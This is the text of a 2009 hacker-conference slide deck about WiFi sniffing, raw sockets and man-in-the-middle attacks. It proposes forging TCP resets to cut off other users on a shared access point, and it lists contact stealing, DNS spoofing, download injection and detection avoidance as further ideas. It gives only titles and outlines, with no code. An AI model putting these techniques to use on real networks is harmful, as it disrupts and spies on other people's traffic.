WiFi networks &

RAW SOCKETS

IL-HACK2009

Eddie Harari

Sniffing WiFi

Managed mode VS Monitor mode Promiscuous mode is

driver/Firmware dependent. Driver and Firmware for each NIC. can we sniff with any card ???Monitor mode, IT IS !!!

802.11 Data frames

Frame size is not fixed ! Encapsulation is 802.2 (inside body). Some networks use QOS ( Extra 2 bytes). Is it so important ?

Sniffing in promiscuous mode

Ethernet II frame “EMULATION”

MITM Implementation

“Clear text” Networks. “WEP” based Networks. Shared & non shared keys. famous last words:

“ I surf through my neighbors WIFI connection.”

Monitor VS Managed

Monitor mode sniffs everything. Monitor mode is undetectable. Packet injection is hard… A word about WIFI encryption. Managed mode is “Dream environment” for packet injection.

So which one is it ?

Pre implementation considerations

SCAPY is for script kiddies !?(SCAPY is good solution for certain things…)

MITM network attack must win RACE conditions .

What are the attacks that can take place here ?

Thinking of an attack

Don’t you hate when your WIFI bandwidth is low cause everyone else is using the AP ?

RESET any TCP -SYN request !From all machines but ours…

Why cant you reset “MS” SYN request on the client side …

MITM implementation

LibPcap is the best tool to use on this scenario. Ability to sniff & inject packets. Support all common DLT. Supports Managed and monitor modes. In monitor mode you can get RADIO headers…(FREAKY).

Code & Implementation

EXAMPLE I – RESETCON CODE RESETCON POC CODE

Some ideas of what can be done…

MSN contact stealer…DNS Spoofing…FILE DOWNLOAD Injection…ANY MITM ATTACK

Important things to remember…

802.11 headers are not fixed. RADIO TAP headers are not fixed. Code must win race conditions. Packet format is important. Detectable !? How to avoid that…

THANK YOU !!!